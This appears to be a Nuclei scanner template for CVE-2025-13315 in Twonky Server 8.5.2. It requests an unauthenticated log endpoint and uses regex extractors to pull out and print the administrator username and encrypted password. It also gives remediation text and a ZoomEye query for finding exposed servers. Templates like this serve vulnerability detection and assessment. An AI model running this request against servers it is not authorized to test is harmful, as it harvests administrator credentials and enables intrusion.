id: CVE-2025-13315

info:
  name: Twonky Server 8.5.2 on Linux and Windows - Log File Exposure
  author: pussycat0x
  severity: critical
  description: |
    Twonky Server 8.5.2 contains a broken access control vulnerability caused by bypassing web service API authentication, letting unauthenticated attackers read log files with administrator credentials, exploit requires no authentication
  remediation: |
    Restrict access to the Twonky Server web service API or implement network segmentation as the vendor has not released a fix.
  impact: |
    Unauthenticated attackers can read sensitive log files containing administrator usernames and encrypted passwords.
  reference:
    - https://www.rapid7.com/blog/post/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed/
  metadata:
    verified: true
    zoomeye-query: app="Twonky Server"
  tags: cve,cve2025,twonky,server,exposure,unauth,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/nmc/rpc/log_getfile"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body,"server_main_impl","LOG_SYSTEM:","upnp_ini_file")'
        condition: and

    extractors:
      - type: regex
        name: username
        group: 1
        part: body
        regex:
          - 'accessuser =([ a-zA-Z0-9]+)'
        internal: true

      - type: regex
        name: password
        part: body
        group: 1
        regex:
          - 'accesspwd =([ :a-zA-Z0-9]+)'
        internal: true

      - type: dsl
        dsl:
          - '"Username :"+  trim(username, "[ ]")'
          - '"EncryptedPassword :"+ trim(password, "[ ]")'
# digest: 4a0a004730450220429082d2aa489ae0606c267c76184eddc72ddd9cbc29d705d63a70967c0e95a6022100d0af8450e27beffffcf0145cb940985676eb324bef1ca132e720a12d3f84aa67:922c64590222798bb761d5b6d8e72950